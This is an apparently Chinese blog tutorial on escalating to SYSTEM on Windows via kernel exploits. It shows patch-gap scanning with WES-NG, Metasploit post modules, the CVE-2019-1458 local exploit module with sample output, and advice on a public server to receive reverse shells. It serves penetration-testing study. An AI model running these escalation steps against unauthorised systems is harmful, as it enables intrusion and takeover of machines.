【Try to Hack】Windows内核溢出漏洞提权

📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年7月10日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

🍫提权用到命令

在这里插入图片描述
whoami /priv

🍫补丁筛选

vulmap
Windows Exploit Suggester - Next Generation (WES-NG)
WindowsVulnScan

WES-NG在Windows平台最好用

vulmap

vulmap:Linux的工具挺好用,但是对于Windows系统层面不太适用。
在这里插入图片描述
必须通过powershell运行(所以有点鸡肋,我们可能一般拿到的是cmd窗口,或者web后门没有powershell环境)
在这里插入图片描述
没有发现什么漏洞(vulmap在Windows平台很鸡肋)

WES-NG

python.exe wes.py systeminfo.txt -o vuln.csv
在这里插入图片描述
在这里插入图片描述
缺失3个补丁,导致可能存在103个漏洞

我们只需要得到服务器的systeminfo信息即可!!!

WindowsVulnScan

也是需要执行powershell脚本
在这里插入图片描述

🍫MSF

优先使用msf,但是msf并不每天都会进行更新最新的CVE。所以,如果最新的CVE没有更新,则利用特定的EXP。

在实战中利用MSF,建议购买服务器(因为外网服务器会去连接我们的主机,所以要有公网ip),2核4G或2核2G,安装Ubuntu系统,只安装MSF

首先得要获得meterpreter权限
backgroud
search 某某CVE
use 某一个模块
set session 刚才session的值 会使用这个exp去攻击我们刚才的会话
需要设置一个反弹shell的payload,并且去换一个端口进行监听

#查询补丁

meterpreter> run post/windows/gather/enum_patches   #可以直接查看哪些补丁没有打
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

#查询Exp

msf> use post/multi/recon/local_exploit_suggester   #该模块用于快速识别系统中可能被利用的漏洞
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM

看这篇
Windows内核溢出漏洞提权
https://blog.csdn.net/qq_36119192/article/details/104280692

🍫利用CVE对应的EXP

windows-kernel-exploits
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值